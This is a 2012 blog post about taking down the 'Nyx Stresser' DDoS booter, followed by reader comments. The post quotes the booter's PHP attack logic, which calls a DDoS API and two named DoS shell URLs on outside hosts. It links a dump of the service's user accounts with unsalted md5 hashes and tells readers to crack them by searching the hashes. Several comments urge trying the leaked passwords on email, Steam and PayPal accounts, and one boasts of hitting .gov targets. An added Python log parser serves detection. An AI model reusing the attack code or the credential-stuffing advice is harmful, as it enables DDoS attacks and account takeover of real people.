Thursday, December 13, 2012

Nyx Stresser


http://www.hackforums.net/showthread.php?tid=2899035

One of many shitty "booters". Took it down just now.



I'm not going to release the source because that would simply encourage skids to copy and paste it and make their own. Here's the core DoS logic though, from "hub.php":

@file_get_contents("http://atomicapi.net/send.php?key={$keyBoot}&host={$host}&port={$port}&time={$time}");

$select = mysql_query("SELECT * FROM shells WHERE status = 'up'");
//shells = "http://95.211.186.68/sudp.php", "http://178.18.19.122/sno.php"

while ($item = mysql_fetch_array($select)) {
    $ch = curl_init($item['url']."?act=phptools&type=".$type."&host=".$host."&time=".$time."&port=".$port);
}

So it uses the "atomic API" DDoS service plus two PHP DoS shells on cheap VPSs rented by the owner. Very sophisticated.
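
Seen from the hosting side, the shell calls in that excerpt leave a recognisable query string in the web server's access log. The following is an added example, not code from the original post or from the booter: it flags requests to a PHP script carrying the `act=phptools`, `type`, `host`, `time` and `port` parameters shown above. The log lines, the addresses and the `type` value are constructed, and Combined Log Format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters the hub.php excerpt appends to every shell URL.
REQUIRED = {"act", "type", "host", "time", "port"}

# Leading part of a Combined Log Format line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_shell_triggers(lines):
    """Return (caller, script path, target host, port, seconds) per matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a log line in the assumed format
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(".php"):
            continue
        q = parse_qs(url.query, keep_blank_values=True)
        # All five parameters must be present and act must be "phptools".
        if not REQUIRED.issubset(q) or q["act"][0] != "phptools":
            continue
        hits.append((m.group("src"), url.path, q["host"][0], q["port"][0], q["time"][0]))
    return hits

# Constructed sample lines using documentation address ranges (not from the post).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Dec/2012:10:01:02 +0000] "GET /sudp.php?act=phptools'
    '&type=EXAMPLE&host=203.0.113.9&time=60&port=80 HTTP/1.1" 200 12',
    '198.51.100.7 - - [13/Dec/2012:10:01:05 +0000] "GET /index.php?page=2&host=a HTTP/1.1" 200 512',
    '192.0.2.44 - - [13/Dec/2012:10:02:11 +0000] "GET /tools.php?act=phptools HTTP/1.1" 404 0',
    'not an access log line',
]

if __name__ == "__main__":
    for hit in find_shell_triggers(SAMPLE_LOG):
        print("possible DoS shell trigger:", hit)
```

A hit gives the abuse desk the calling address (the booter's front end), the script to remove from the VPS, and the victim address and duration for the report.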

Here's the user table from the database. All password hashes are unsalted md5. Some already cracked. For the ones that I was too lazy to crack, try Googling the hash and you'll have a decent success rate.

Account Dump:
http://pastebay.net/1173575

13 comments:

  1. This comment has been removed by the author.

  2. Wow that's a shame, at least you got the source and the account data base.

  3. This comment has been removed by the author.

  4. He set up accounts again. Some accounts worked. Idiot didn't blacklist .gov so I had a little fun >:)

  5. Good job.

    Try the passwords on their emails and HF accounts as well. You'll probably have a pretty high success rate.

    1. Try them on Steam, Minecraft and PayPal too. I got some MC accounts from when vdoss was hacked.

  6. They also have PayPal accounts and LR. HF accounts are worthless :>

  7. Mind is blown... I've done MIPS and a bit of x86, but not much, and a little bit of ARM, but they're all a little different. And it doesn't necessarily help much when other people can make insane spaghetti code like in that hubs.php that's meant to drive you wonky!

  8. What'd you use to hack into the admin panel?

  9. Good job and all. But I don't see why you aren't focusing on stress testers that are just straight up horrible. Such as Vdoss, XrShit and Atomic Shit (the owner tried to ddos me once, hahaha!)
    It went something like this:
    Me: fix your damn stress tester or I am filing a scam report
    Retarded American: ok one moment
    Retarded American:
    He then blocked me after I trolled him.

  10. Mad props. Keep up the good work.

  11. Haha, Admin, the booter sucked, yeah; the owner is also an idiot.
